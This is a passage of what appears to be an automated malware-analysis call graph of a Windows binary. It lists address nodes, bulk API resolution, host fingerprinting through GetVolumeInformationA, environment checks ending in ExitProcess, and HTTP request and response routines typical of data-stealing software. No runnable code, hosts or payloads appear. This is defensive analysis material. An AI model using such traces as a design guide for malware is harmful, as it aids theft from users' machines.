14051->14052 14053 5445c0 2 API calls 14052->14053 14054 542b64 14053->14054 14055 5445c0 2 API calls 14054->14055 14056 542b7d 14055->14056 14057 5445c0 2 API calls 14056->14057 14058 542b96 14057->14058 14059 5445c0 2 API calls 14058->14059 14060 542baf 14059->14060 14061 5445c0 2 API calls 14060->14061 14062 542bc8 14061->14062 14063 5445c0 2 API calls 14062->14063 14064 542be1 14063->14064 14065 5445c0 2 API calls 14064->14065 14066 542bfa 14065->14066 14067 5445c0 2 API calls 14066->14067 14068 542c13 14067->14068 14069 5445c0 2 API calls 14068->14069 14070 542c2c 14069->14070 14071 5445c0 2 API calls 14070->14071 14072 542c45 14071->14072 14073 5445c0 2 API calls 14072->14073 14074 542c5e 14073->14074 14075 5445c0 2 API calls 14074->14075 14076 542c77 14075->14076 14077 5445c0 2 API calls 14076->14077 14078 542c90 14077->14078 14079 5445c0 2 API calls 14078->14079 14080 542ca9 14079->14080 14081 5445c0 2 API calls 14080->14081 14082 542cc2 14081->14082 14083 5445c0 2 API calls 14082->14083 14084 542cdb 14083->14084 14085 5445c0 2 API calls 14084->14085 14086 542cf4 14085->14086 14087 5445c0 2 API calls 14086->14087 14088 542d0d 14087->14088 14089 5445c0 2 API calls 14088->14089 14090 542d26 14089->14090 14091 5445c0 2 API calls 14090->14091 14092 542d3f 14091->14092 14093 5445c0 2 API calls 14092->14093 14094 542d58 14093->14094 14095 5445c0 2 API calls 14094->14095 14096 542d71 14095->14096 14097 5445c0 2 API calls 14096->14097 14098 542d8a 14097->14098 14099 5445c0 2 API calls 14098->14099 14100 542da3 14099->14100 14101 5445c0 2 API calls 14100->14101 14102 542dbc 14101->14102 14103 5445c0 2 API calls 14102->14103 14104 542dd5 14103->14104 14105 5445c0 2 API calls 14104->14105 14106 542dee 14105->14106 14107 5445c0 2 API calls 14106->14107 14108 542e07 14107->14108 14109 5445c0 2 API calls 14108->14109 14110 542e20 14109->14110 14111 5445c0 2 API calls 14110->14111 14112 542e39 14111->14112 14113 5445c0 2 API calls 14112->14113 14114 542e52 14113->14114 14115 5445c0 2 API calls 14114->14115 14116 542e6b 14115->14116 14117 5445c0 2 API calls 14116->14117 14118 542e84 14117->14118 14119 5445c0 2 API calls 14118->14119 14120 542e9d 14119->14120 14121 5445c0 2 API calls 14120->14121 14122 542eb6 14121->14122 14123 5445c0 2 API calls 14122->14123 14124 542ecf 14123->14124 14125 5445c0 2 API calls 14124->14125 14126 542ee8 14125->14126 14127 5445c0 2 API calls 14126->14127 14128 542f01 14127->14128 14129 5445c0 2 API calls 14128->14129 14130 542f1a 14129->14130 14131 5445c0 2 API calls 14130->14131 14132 542f33 14131->14132 14133 5445c0 2 API calls 14132->14133 14134 542f4c 14133->14134 14135 5445c0 2 API calls 14134->14135 14136 542f65 14135->14136 14137 5445c0 2 API calls 14136->14137 14138 542f7e 14137->14138 14139 5445c0 2 API calls 14138->14139 14140 542f97 14139->14140 14141 5445c0 2 API calls 14140->14141 14142 542fb0 14141->14142 14143 5445c0 2 API calls 14142->14143 14144 542fc9 14143->14144 14145 5445c0 2 API calls 14144->14145 14146 542fe2 14145->14146 14147 5445c0 2 API calls 14146->14147 14148 542ffb 14147->14148 14149 5445c0 2 API calls 14148->14149 14150 543014 14149->14150 14151 5445c0 2 API calls 14150->14151 14152 54302d 14151->14152 14153 5445c0 2 API calls 14152->14153 14154 543046 14153->14154 14155 5445c0 2 API calls 14154->14155 14156 54305f 14155->14156 14157 5445c0 2 API calls 14156->14157 14158 543078 14157->14158 14159 5445c0 2 API calls 14158->14159 14160 543091 14159->14160 14161 5445c0 2 API calls 14160->14161 14162 5430aa 14161->14162 14163 5445c0 2 API calls 14162->14163 14164 5430c3 14163->14164 14165 5445c0 2 API calls 14164->14165 14166 5430dc 14165->14166 14167 5445c0 2 API calls 14166->14167 14168 5430f5 14167->14168 14169 5445c0 2 API calls 14168->14169 14170 54310e 14169->14170 14171 5445c0 2 API calls 14170->14171 14172 543127 14171->14172 14173 5445c0 2 API calls 14172->14173 14174 543140 14173->14174 14175 5445c0 2 API calls 14174->14175 14176 543159 14175->14176 14177 5445c0 2 API calls 14176->14177 14178 543172 14177->14178 14179 5445c0 2 API calls 14178->14179 14180 54318b 14179->14180 14181 5445c0 2 API calls 14180->14181 14182 5431a4 14181->14182 14183 5445c0 2 API calls 14182->14183 14184 5431bd 14183->14184 14185 5445c0 2 API calls 14184->14185 14186 5431d6 14185->14186 14187 5445c0 2 API calls 14186->14187 14188 5431ef 14187->14188 14189 5445c0 2 API calls 14188->14189 14190 543208 14189->14190 14191 5445c0 2 API calls 14190->14191 14192 543221 14191->14192 14193 5445c0 2 API calls 14192->14193 14194 54323a 14193->14194 14195 5445c0 2 API calls 14194->14195 14196 543253 14195->14196 14197 5445c0 2 API calls 14196->14197 14198 54326c 14197->14198 14199 5445c0 2 API calls 14198->14199 14200 543285 14199->14200 14201 5445c0 2 API calls 14200->14201 14202 54329e 14201->14202 14203 5445c0 2 API calls 14202->14203 14204 5432b7 14203->14204 14205 5445c0 2 API calls 14204->14205 14206 5432d0 14205->14206 14207 5445c0 2 API calls 14206->14207 14208 5432e9 14207->14208 14209 5445c0 2 API calls 14208->14209 14210 543302 14209->14210 14211 5445c0 2 API calls 14210->14211 14212 54331b 14211->14212 14213 5445c0 2 API calls 14212->14213 14214 543334 14213->14214 14215 5445c0 2 API calls 14214->14215 14216 54334d 14215->14216 14217 5445c0 2 API calls 14216->14217 14218 543366 14217->14218 14219 5445c0 2 API calls 14218->14219 14220 54337f 14219->14220 14221 5445c0 2 API calls 14220->14221 14222 543398 14221->14222 14223 5445c0 2 API calls 14222->14223 14224 5433b1 14223->14224 14225 5445c0 2 API calls 14224->14225 14226 5433ca 14225->14226 14227 5445c0 2 API calls 14226->14227 14228 5433e3 14227->14228 14229 5445c0 2 API calls 14228->14229 14230 5433fc 14229->14230 14231 5445c0 2 API calls 14230->14231 14232 543415 14231->14232 14233 5445c0 2 API calls 14232->14233 14234 54342e 14233->14234 14235 5445c0 2 API calls 14234->14235 14236 543447 14235->14236 14237 5445c0 2 API calls 14236->14237 14238 543460 14237->14238 14239 5445c0 2 API calls 14238->14239 14240 543479 14239->14240 14241 5445c0 2 API calls 14240->14241 14242 543492 14241->14242 14243 5445c0 2 API calls 14242->14243 14244 5434ab 14243->14244 14245 5445c0 2 API calls 14244->14245 14246 5434c4 14245->14246 14247 5445c0 2 API calls 14246->14247 14248 5434dd 14247->14248 14249 5445c0 2 API calls 14248->14249 14250 5434f6 14249->14250 14251 5445c0 2 API calls 14250->14251 14252 54350f 14251->14252 14253 5445c0 2 API calls 14252->14253 14254 543528 14253->14254 14255 5445c0 2 API calls 14254->14255 14256 543541 14255->14256 14257 5445c0 2 API calls 14256->14257 14258 54355a 14257->14258 14259 5445c0 2 API calls 14258->14259 14260 543573 14259->14260 14261 5445c0 2 API calls 14260->14261 14262 54358c 14261->14262 14263 5445c0 2 API calls 14262->14263 14264 5435a5 14263->14264 14265 5445c0 2 API calls 14264->14265 14266 5435be 14265->14266 14267 5445c0 2 API calls 14266->14267 14268 5435d7 14267->14268 14269 5445c0 2 API calls 14268->14269 14270 5435f0 14269->14270 14271 5445c0 2 API calls 14270->14271 14272 543609 14271->14272 14273 5445c0 2 API calls 14272->14273 14274 543622 14273->14274 14275 5445c0 2 API calls 14274->14275 14276 54363b 14275->14276 14277 5445c0 2 API calls 14276->14277 14278 543654 14277->14278 14279 5445c0 2 API calls 14278->14279 14280 54366d 14279->14280 14281 5445c0 2 API calls 14280->14281 14282 543686 14281->14282 14283 5445c0 2 API calls 14282->14283 14284 54369f 14283->14284 14285 5445c0 2 API calls 14284->14285 14286 5436b8 14285->14286 14287 5445c0 2 API calls 14286->14287 14288 5436d1 14287->14288 14289 5445c0 2 API calls 14288->14289 14290 5436ea 14289->14290 14291 5445c0 2 API calls 14290->14291 14292 543703 14291->14292 14293 5445c0 2 API calls 14292->14293 14294 54371c 14293->14294 14295 5445c0 2 API calls 14294->14295 14296 543735 14295->14296 14297 5445c0 2 API calls 14296->14297 14298 54374e 14297->14298 14299 5445c0 2 API calls 14298->14299 14300 543767 14299->14300 14301 5445c0 2 API calls 14300->14301 14302 543780 14301->14302 14303 5445c0 2 API calls 14302->14303 14304 543799 14303->14304 14305 5445c0 2 API calls 14304->14305 14306 5437b2 14305->14306 14307 5445c0 2 API calls 14306->14307 14308 5437cb 14307->14308 14309 5445c0 2 API calls 14308->14309 14310 5437e4 14309->14310 14311 5445c0 2 API calls 14310->14311 14312 5437fd 14311->14312 14313 5445c0 2 API calls 14312->14313 14314 543816 14313->14314 14315 5445c0 2 API calls 14314->14315 14316 54382f 14315->14316 14317 5445c0 2 API calls 14316->14317 14318 543848 14317->14318 14319 5445c0 2 API calls 14318->14319 14320 543861 14319->14320 14321 5445c0 2 API calls 14320->14321 14322 54387a 14321->14322 14323 5445c0 2 API calls 14322->14323 14324 543893 14323->14324 14325 5445c0 2 API calls 14324->14325 14326 5438ac 14325->14326 14327 5445c0 2 API calls 14326->14327 14328 5438c5 14327->14328 14329 5445c0 2 API calls 14328->14329 14330 5438de 14329->14330 14331 5445c0 2 API calls 14330->14331 14332 5438f7 14331->14332 14333 5445c0 2 API calls 14332->14333 14334 543910 14333->14334 14335 5445c0 2 API calls 14334->14335 14336 543929 14335->14336 14337 5445c0 2 API calls 14336->14337 14338 543942 14337->14338 14339 5445c0 2 API calls 14338->14339 14340 54395b 14339->14340 14341 5445c0 2 API calls 14340->14341 14342 543974 14341->14342 14343 5445c0 2 API calls 14342->14343 14344 54398d 14343->14344 14345 5445c0 2 API calls 14344->14345 14346 5439a6 14345->14346 14347 5445c0 2 API calls 14346->14347 14348 5439bf 14347->14348 14349 5445c0 2 API calls 14348->14349 14350 5439d8 14349->14350 14351 5445c0 2 API calls 14350->14351 14352 5439f1 14351->14352 14353 5445c0 2 API calls 14352->14353 14354 543a0a 14353->14354 14355 5445c0 2 API calls 14354->14355 14356 543a23 14355->14356 14357 5445c0 2 API calls 14356->14357 14358 543a3c 14357->14358 14359 5445c0 2 API calls 14358->14359 14360 543a55 14359->14360 14361 5445c0 2 API calls 14360->14361 14362 543a6e 14361->14362 14363 5445c0 2 API calls 14362->14363 14364 543a87 14363->14364 14365 5445c0 2 API calls 14364->14365 14366 543aa0 14365->14366 14367 5445c0 2 API calls 14366->14367 14368 543ab9 14367->14368 14369 5445c0 2 API calls 14368->14369 14370 543ad2 14369->14370 14371 5445c0 2 API calls 14370->14371 14372 543aeb 14371->14372 14373 5445c0 2 API calls 14372->14373 14374 543b04 14373->14374 14375 5445c0 2 API calls 14374->14375 14376 543b1d 14375->14376 14377 5445c0 2 API calls 14376->14377 14378 543b36 14377->14378 14379 5445c0 2 API calls 14378->14379 14380 543b4f 14379->14380 14381 5445c0 2 API calls 14380->14381 14382 543b68 14381->14382 14383 5445c0 2 API calls 14382->14383 14384 543b81 14383->14384 14385 5445c0 2 API calls 14384->14385 14386 543b9a 14385->14386 14387 5445c0 2 API calls 14386->14387 14388 543bb3 14387->14388 14389 5445c0 2 API calls 14388->14389 14390 543bcc 14389->14390 14391 5445c0 2 API calls 14390->14391 14392 543be5 14391->14392 14393 5445c0 2 API calls 14392->14393 14394 543bfe 14393->14394 14395 5445c0 2 API calls 14394->14395 14396 543c17 14395->14396 14397 5445c0 2 API calls 14396->14397 14398 543c30 14397->14398 14399 5445c0 2 API calls 14398->14399 14400 543c49 14399->14400 14401 5445c0 2 API calls 14400->14401 14402 543c62 14401->14402 14403 5445c0 2 API calls 14402->14403 14404 543c7b 14403->14404 14405 5445c0 2 API calls 14404->14405 14406 543c94 14405->14406 14407 5445c0 2 API calls 14406->14407 14408 543cad 14407->14408 14409 5445c0 2 API calls 14408->14409 14410 543cc6 14409->14410 14411 5445c0 2 API calls 14410->14411 14412 543cdf 14411->14412 14413 5445c0 2 API calls 14412->14413 14414 543cf8 14413->14414 14415 5445c0 2 API calls 14414->14415 14416 543d11 14415->14416 14417 5445c0 2 API calls 14416->14417 14418 543d2a 14417->14418 14419 5445c0 2 API calls 14418->14419 14420 543d43 14419->14420 14421 5445c0 2 API calls 14420->14421 14422 543d5c 14421->14422 14423 5445c0 2 API calls 14422->14423 14424 543d75 14423->14424 14425 5445c0 2 API calls 14424->14425 14426 543d8e 14425->14426 14427 5445c0 2 API calls 14426->14427 14428 543da7 14427->14428 14429 5445c0 2 API calls 14428->14429 14430 543dc0 14429->14430 14431 5445c0 2 API calls 14430->14431 14432 543dd9 14431->14432 14433 5445c0 2 API calls 14432->14433 14434 543df2 14433->14434 14435 5445c0 2 API calls 14434->14435 14436 543e0b 14435->14436 14437 5445c0 2 API calls 14436->14437 14438 543e24 14437->14438 14439 5445c0 2 API calls 14438->14439 14440 543e3d 14439->14440 14441 5445c0 2 API calls 14440->14441 14442 543e56 14441->14442 14443 5445c0 2 API calls 14442->14443 14444 543e6f 14443->14444 14445 5445c0 2 API calls 14444->14445 14446 543e88 14445->14446 14447 5445c0 2 API calls 14446->14447 14448 543ea1 14447->14448 14449 5445c0 2 API calls 14448->14449 14450 543eba 14449->14450 14451 5445c0 2 API calls 14450->14451 14452 543ed3 14451->14452 14453 5445c0 2 API calls 14452->14453 14454 543eec 14453->14454 14455 5445c0 2 API calls 14454->14455 14456 543f05 14455->14456 14457 5445c0 2 API calls 14456->14457 14458 543f1e 14457->14458 14459 5445c0 2 API calls 14458->14459 14460 543f37 14459->14460 14461 5445c0 2 API calls 14460->14461 14462 543f50 14461->14462 14463 5445c0 2 API calls 14462->14463 14464 543f69 14463->14464 14465 5445c0 2 API calls 14464->14465 14466 543f82 14465->14466 14467 5445c0 2 API calls 14466->14467 14468 543f9b 14467->14468 14469 5445c0 2 API calls 14468->14469 14470 543fb4 14469->14470 14471 5445c0 2 API calls 14470->14471 14472 543fcd 14471->14472 14473 5445c0 2 API calls 14472->14473 14474 543fe6 14473->14474 14475 5445c0 2 API calls 14474->14475 14476 543fff 14475->14476 14477 5445c0 2 API calls 14476->14477 14478 544018 14477->14478 14479 5445c0 2 API calls 14478->14479 14480 544031 14479->14480 14481 5445c0 2 API calls 14480->14481 14482 54404a 14481->14482 14483 5445c0 2 API calls 14482->14483 14484 544063 14483->14484 14485 5445c0 2 API calls 14484->14485 14486 54407c 14485->14486 14487 5445c0 2 API calls 14486->14487 14488 544095 14487->14488 14489 5445c0 2 API calls 14488->14489 14490 5440ae 14489->14490 14491 5445c0 2 API calls 14490->14491 14492 5440c7 14491->14492 14493 5445c0 2 API calls 14492->14493 14494 5440e0 14493->14494 14495 5445c0 2 API calls 14494->14495 14496 5440f9 14495->14496 14497 5445c0 2 API calls 14496->14497 14498 544112 14497->14498 14499 5445c0 2 API calls 14498->14499 14500 54412b 14499->14500 14501 5445c0 2 API calls 14500->14501 14502 544144 14501->14502 14503 5445c0 2 API calls 14502->14503 14504 54415d 14503->14504 14505 5445c0 2 API calls 14504->14505 14506 544176 14505->14506 14507 5445c0 2 API calls 14506->14507 14508 54418f 14507->14508 14509 5445c0 2 API calls 14508->14509 14510 5441a8 14509->14510 14511 5445c0 2 API calls 14510->14511 14512 5441c1 14511->14512 14513 5445c0 2 API calls 14512->14513 14514 5441da 14513->14514 14515 5445c0 2 API calls 14514->14515 14516 5441f3 14515->14516 14517 5445c0 2 API calls 14516->14517 14518 54420c 14517->14518 14519 5445c0 2 API calls 14518->14519 14520 544225 14519->14520 14521 5445c0 2 API calls 14520->14521 14522 54423e 14521->14522 14523 5445c0 2 API calls 14522->14523 14524 544257 14523->14524 14525 5445c0 2 API calls 14524->14525 14526 544270 14525->14526 14527 5445c0 2 API calls 14526->14527 14528 544289 14527->14528 14529 5445c0 2 API calls 14528->14529 14530 5442a2 14529->14530 14531 5445c0 2 API calls 14530->14531 14532 5442bb 14531->14532 14533 5445c0 2 API calls 14532->14533 14534 5442d4 14533->14534 14535 5445c0 2 API calls 14534->14535 14536 5442ed 14535->14536 14537 5445c0 2 API calls 14536->14537 14538 544306 14537->14538 14539 5445c0 2 API calls 14538->14539 14540 54431f 14539->14540 14541 5445c0 2 API calls 14540->14541 14542 544338 14541->14542 14543 5445c0 2 API calls 14542->14543 14544 544351 14543->14544 14545 5445c0 2 API calls 14544->14545 14546 54436a 14545->14546 14547 5445c0 2 API calls 14546->14547 14548 544383 14547->14548 14549 5445c0 2 API calls 14548->14549 14550 54439c 14549->14550 14551 5445c0 2 API calls 14550->14551 14552 5443b5 14551->14552 14553 5445c0 2 API calls 14552->14553 14554 5443ce 14553->14554 14555 5445c0 2 API calls 14554->14555 14556 5443e7 14555->14556 14557 5445c0 2 API calls 14556->14557 14558 544400 14557->14558 14559 5445c0 2 API calls 14558->14559 14560 544419 14559->14560 14561 5445c0 2 API calls 14560->14561 14562 544432 14561->14562 14563 5445c0 2 API calls 14562->14563 14564 54444b 14563->14564 14565 5445c0 2 API calls 14564->14565 14566 544464 14565->14566 14567 5445c0 2 API calls 14566->14567 14568 54447d 14567->14568 14569 5445c0 2 API calls 14568->14569 14570 544496 14569->14570 14571 5445c0 2 API calls 14570->14571 14572 5444af 14571->14572 14573 5445c0 2 API calls 14572->14573 14574 5444c8 14573->14574 14575 5445c0 2 API calls 14574->14575 14576 5444e1 14575->14576 14577 5445c0 2 API calls 14576->14577 14578 5444fa 14577->14578 14579 5445c0 2 API calls 14578->14579 14580 544513 14579->14580 14581 5445c0 2 API calls 14580->14581 14582 54452c 14581->14582 14583 5445c0 2 API calls 14582->14583 14584 544545 14583->14584 14585 5445c0 2 API calls 14584->14585 14586 54455e 14585->14586 14587 5445c0 2 API calls 14586->14587 14588 544577 14587->14588 14589 5445c0 2 API calls 14588->14589 14590 544590 14589->14590 14591 5445c0 2 API calls 14590->14591 14592 5445a9 14591->14592 14593 559c10 14592->14593 14594 55a036 8 API calls 14593->14594 14595 559c20 43 API calls 14593->14595 14596 55a146 14594->14596 14597 55a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14594->14597 14595->14594 14598 55a216 14596->14598 14599 55a153 8 API calls 14596->14599 14597->14596 14600 55a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14598->14600 14601 55a298 14598->14601 14599->14598 14600->14601 14602 55a2a5 6 API calls 14601->14602 14603 55a337 14601->14603 14602->14603 14604 55a344 9 API calls 14603->14604 14605 55a41f 14603->14605 14604->14605 14606 55a4a2 14605->14606 14607 55a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14605->14607 14608 55a4dc 14606->14608 14609 55a4ab GetProcAddress GetProcAddress 14606->14609 14607->14606 14610 55a515 14608->14610 14611 55a4e5 GetProcAddress GetProcAddress 14608->14611 14609->14608 14612 55a612 14610->14612 14613 55a522 10 API calls 14610->14613 14611->14610 14614 55a67d 14612->14614 14615 55a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14612->14615 14613->14612 14616 55a686 GetProcAddress 14614->14616 14617 55a69e 14614->14617 14615->14614 14616->14617 14618 55a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14617->14618 14619 555ca3 14617->14619 14618->14619 14620 541590 14619->14620 15739 541670 14620->15739 14623 55a7a0 lstrcpy 14624 5415b5 14623->14624 14625 55a7a0 lstrcpy 14624->14625 14626 5415c7 14625->14626 14627 55a7a0 lstrcpy 14626->14627 14628 5415d9 14627->14628 14629 55a7a0 lstrcpy 14628->14629 14630 541663 14629->14630 14631 555510 14630->14631 14632 555521 14631->14632 14633 55a820 2 API calls 14632->14633 14634 55552e 14633->14634 14635 55a820 2 API calls 14634->14635 14636 55553b 14635->14636 14637 55a820 2 API calls 14636->14637 14638 555548 14637->14638 14639 55a740 lstrcpy 14638->14639 14640 555555 14639->14640 14641 55a740 lstrcpy 14640->14641 14642 555562 14641->14642 14643 55a740 lstrcpy 14642->14643 14644 55556f 14643->14644 14645 55a740 lstrcpy 14644->14645 14685 55557c 14645->14685 14646 55a820 lstrlen lstrcpy 14646->14685 14647 55a740 lstrcpy 14647->14685 14648 55a8a0 lstrcpy 14648->14685 14649 555643 StrCmpCA 14649->14685 14650 5556a0 StrCmpCA 14651 5557dc 14650->14651 14650->14685 14653 55a8a0 lstrcpy 14651->14653 14652 55a7a0 lstrcpy 14652->14685 14654 5557e8 14653->14654 14655 55a820 2 API calls 14654->14655 14656 5557f6 14655->14656 14658 55a820 2 API calls 14656->14658 14657 555856 StrCmpCA 14659 555991 14657->14659 14657->14685 14661 555805 14658->14661 14660 55a8a0 lstrcpy 14659->14660 14663 55599d 14660->14663 14664 541670 lstrcpy 14661->14664 14662 541590 lstrcpy 14662->14685 14665 55a820 2 API calls 14663->14665 14684 555811 14664->14684 14667 5559ab 14665->14667 14666 5551f0 20 API calls 14666->14685 14669 55a820 2 API calls 14667->14669 14668 555a0b StrCmpCA 14670 555a16 Sleep 14668->14670 14671 555a28 14668->14671 14672 5559ba 14669->14672 14670->14685 14673 55a8a0 lstrcpy 14671->14673 14674 541670 lstrcpy 14672->14674 14675 555a34 14673->14675 14674->14684 14676 55a820 2 API calls 14675->14676 14677 555a43 14676->14677 14679 55a820 2 API calls 14677->14679 14678 5552c0 25 API calls 14678->14685 14680 555a52 14679->14680 14682 541670 lstrcpy 14680->14682 14681 55578a StrCmpCA 14681->14685 14682->14684 14683 55593f StrCmpCA 14683->14685 14684->13738 14685->14646 14685->14647 14685->14648 14685->14649 14685->14650 14685->14652 14685->14657 14685->14662 14685->14666 14685->14668 14685->14678 14685->14681 14685->14683 14687 557553 GetVolumeInformationA 14686->14687 14688 55754c 14686->14688 14694 557591 14687->14694 14688->14687 14689 5575fc GetProcessHeap RtlAllocateHeap 14690 557619 14689->14690 14691 557628 wsprintfA 14689->14691 14692 55a740 lstrcpy 14690->14692 14693 55a740 lstrcpy 14691->14693 14695 555da7 14692->14695 14693->14695 14694->14689 14695->13759 14697 55a7a0 lstrcpy 14696->14697 14698 544899 14697->14698 15748 5447b0 14698->15748 14700 5448a5 14701 55a740 lstrcpy 14700->14701 14702 5448d7 14701->14702 14703 55a740 lstrcpy 14702->14703 14704 5448e4 14703->14704 14705 55a740 lstrcpy 14704->14705 14706 5448f1 14705->14706 14707 55a740 lstrcpy 14706->14707 14708 5448fe 14707->14708 14709 55a740 lstrcpy 14708->14709 14710 54490b InternetOpenA StrCmpCA 14709->14710 14711 544944 14710->14711 14712 544ecb InternetCloseHandle 14711->14712 15754 558b60 14711->15754 14714 544ee8 14712->14714 15769 549ac0 CryptStringToBinaryA 14714->15769 14715 544963 15762 55a920 14715->15762 14718 544976 14720 55a8a0 lstrcpy 14718->14720 14726 54497f 14720->14726 14721 55a820 2 API calls 14722 544f05 14721->14722 14724 55a9b0 4 API calls 14722->14724 14723 544f27 codecvt 14728 55a7a0 lstrcpy 14723->14728 14725 544f1b 14724->14725 14727 55a8a0 lstrcpy 14725->14727 14729 55a9b0 4 API calls 14726->14729 14727->14723 14740 544f57 14728->14740 14730 5449a9 14729->14730 14731 55a8a0 lstrcpy 14730->14731 14732 5449b2 14731->14732 14733 55a9b0 4 API calls 14732->14733 14734 5449d1 14733->14734 14735 55a8a0 lstrcpy 14734->14735 14736 5449da 14735->14736 14737 55a920 3 API calls 14736->14737 14738 5449f8 14737->14738 14739 55a8a0 lstrcpy 14738->14739 14741 544a01 14739->14741 14740->13762 14742 55a9b0 4 API calls 14741->14742 14743 544a20 14742->14743 14744 55a8a0 lstrcpy 14743->14744 14745 544a29 14744->14745 14746 55a9b0 4 API calls 14745->14746 14747 544a48 14746->14747 14748 55a8a0 lstrcpy 14747->14748 14749 544a51 14748->14749 14750 55a9b0 4 API calls 14749->14750 14751 544a7d 14750->14751 14752 55a920 3 API calls 14751->14752 14753 544a84 14752->14753 14754 55a8a0 lstrcpy 14753->14754 14755 544a8d 14754->14755 14756 544aa3 InternetConnectA 14755->14756 14756->14712 14757 544ad3 HttpOpenRequestA 14756->14757 14759 544ebe InternetCloseHandle 14757->14759 14760 544b28 14757->14760 14759->14712 14761 55a9b0 4 API calls 14760->14761 14762 544b3c 14761->14762 14763 55a8a0 lstrcpy 14762->14763 14764 544b45 14763->14764 14765 55a920 3 API calls 14764->14765 14766 544b63 14765->14766 14767 55a8a0 lstrcpy 14766->14767 14768 544b6c 14767->14768 14769 55a9b0 4 API calls 14768->14769 14770 544b8b 14769->14770 14771 55a8a0 lstrcpy 14770->14771 14772 544b94 14771->14772 14773 55a9b0 4 API calls 14772->14773 14774 544bb5 14773->14774 14775 55a8a0 lstrcpy 14774->14775 14776 544bbe 14775->14776 14777 55a9b0 4 API calls 14776->14777 14778 544bde 14777->14778 14779 55a8a0 lstrcpy 14778->14779 14780 544be7 14779->14780 14781 55a9b0 4 API calls 14780->14781 14782 544c06 14781->14782 14783 55a8a0 lstrcpy 14782->14783 14784 544c0f 14783->14784 14785 55a920 3 API calls 14784->14785 14786 544c2d 14785->14786 14787 55a8a0 lstrcpy 14786->14787 14788 544c36 14787->14788 14789 55a9b0 4 API calls 14788->14789 14790 544c55 14789->14790 14791 55a8a0 lstrcpy 14790->14791 14792 544c5e 14791->14792 14793 55a9b0 4 API calls 14792->14793 14794 544c7d 14793->14794 14795 55a8a0 lstrcpy 14794->14795 14796 544c86 14795->14796 14797 55a920 3 API calls 14796->14797 14798 544ca4 14797->14798 14799 55a8a0 lstrcpy 14798->14799 14800 544cad 14799->14800 14801 55a9b0 4 API calls 14800->14801 14802 544ccc 14801->14802 14803 55a8a0 lstrcpy 14802->14803 14804 544cd5 14803->14804 14805 55a9b0 4 API calls 14804->14805 14806 544cf6 14805->14806 14807 55a8a0 lstrcpy 14806->14807 14808 544cff 14807->14808 14809 55a9b0 4 API calls 14808->14809 14810 544d1f 14809->14810 14811 55a8a0 lstrcpy 14810->14811 14812 544d28 14811->14812 14813 55a9b0 4 API calls 14812->14813 14814 544d47 14813->14814 14815 55a8a0 lstrcpy 14814->14815 14816 544d50 14815->14816 14817 55a920 3 API calls 14816->14817 14818 544d6e 14817->14818 14819 55a8a0 lstrcpy 14818->14819 14820 544d77 14819->14820 14821 55a740 lstrcpy 14820->14821 14822 544d92 14821->14822 14823 55a920 3 API calls 14822->14823 14824 544db3 14823->14824 14825 55a920 3 API calls 14824->14825 14826 544dba 14825->14826 14827 55a8a0 lstrcpy 14826->14827 14828 544dc6 14827->14828 14829 544de7 lstrlen 14828->14829 14830 544dfa 14829->14830 14831 544e03 lstrlen 14830->14831 15768 55aad0 14831->15768 14833 544e13 HttpSendRequestA 14834 544e32 InternetReadFile 14833->14834 14835 544e67 InternetCloseHandle 14834->14835 14840 544e5e 14834->14840 14837 55a800 14835->14837 14837->14759 14838 55a9b0 4 API calls 14838->14840 14839 55a8a0 lstrcpy 14839->14840 14840->14834 14840->14835 14840->14838 14840->14839 15775 55aad0 14841->15775 14843 5517c4 StrCmpCA 14844 5517d7 14843->14844 14845 5517cf ExitProcess 14843->14845 14846 5519c2 14844->14846 14847 5518f1 StrCmpCA 14844->14847 14848 551951 StrCmpCA 14844->14848 14849 551970 StrCmpCA 14844->14849 14850 551913 StrCmpCA 14844->14850 14851 551932 StrCmpCA 14844->14851 14852 55185d StrCmpCA 14844->14852 14853 55187f StrCmpCA 14844->14853 14854 5518ad StrCmpCA 14844->14854 14855 5518cf StrCmpCA 14844->14855 14856 55a820 lstrlen lstrcpy 14844->14856 14846->13764 14847->14844 14848->14844 14849->14844 14850->14844 14851->14844 14852->14844 14853->14844 14854->14844 14855->14844 14856->14844 14858 55a7a0 lstrcpy 14857->14858 14859 545979 14858->14859 14860 5447b0 2 API calls 14859->14860 14861 545985 14860->14861 14862 55a740 lstrcpy 14861->14862 14863 5459ba 14862->14863 14864 55a740 lstrcpy 14863->14864 14865 5459c7 14864->14865 14866 55a740 lstrcpy 14865->14866 14867 5459d4 14866->14867 14868 55a740 lstrcpy 14867->14868 14869 5459e1 14868->14869 14870 55a740 lstrcpy 14869->14870 14871 5459ee InternetOpenA StrCmpCA 14870->14871 14872 545a1d 14871->14872 14873 545fc3 InternetCloseHandle 14872->14873 14874 558b60 3 API calls 14872->14874 14875 545fe0 14873->14875 14876 545a3c 14874->14876 14878 549ac0 4 API calls 14875->14878 14877 55a920 3 API calls 14876->14877 14879 545a4f 14877->14879 14880 545fe6 14878->14880 14881 55a8a0 lstrcpy 14879->14881 14882 55a820 2 API calls 14880->14882 14884 54601f codecvt 14880->14884 14886 545a58 14881->14886 14883 545ffd 14882->14883 14885 55a9b0 4 API calls 14883->14885 14888 55a7a0 lstrcpy 14884->14888 14887 546013 14885->14887 14890 55a9b0 4 API calls 14886->14890 14889 55a8a0 lstrcpy 14887->14889 14898 54604f 14888->14898 14889->14884 14891 545a82 14890->14891 14892 55a8a0 lstrcpy 14891->14892 14893 545a8b 14892->14893 14894 55a9b0 4 API calls 14893->14894 14895 545aaa 14894->14895 14896 55a8a0 lstrcpy 14895->14896 14897 545ab3 14896->14897 14899 55a920 3 API calls 14897->14899 14898->13770 14900 545ad1 14899->14900 14901 55a8a0 lstrcpy 14900->14901 14902 545ada 14901->14902 14903 55a9b0 4 API calls 14902->14903 14904 545af9 14903->14904 14905 55a8a0 lstrcpy 14904->14905 14906 545b02 14905->14906 14907 55a9b0 4 API calls 14906->14907 14908 545b21 14907->14908 14909 55a8a0 lstrcpy 14908->14909 14910 545b2a 14909->14910 14911 55a9b0 4 API calls 14910->14911 14912 545b56 14911->14912 14913 55a920 3 API calls 14912->14913 14914 545b5d 14913->14914 14915 55a8a0 lstrcpy 14914->14915 14916 545b66 14915->14916 14917 545b7c InternetConnectA 14916->14917 14917->14873 14918 545bac HttpOpenRequestA 14917->14918 14920 545fb6 InternetCloseHandle 14918->14920 14921 545c0b 14918->14921 14920->14873 14922 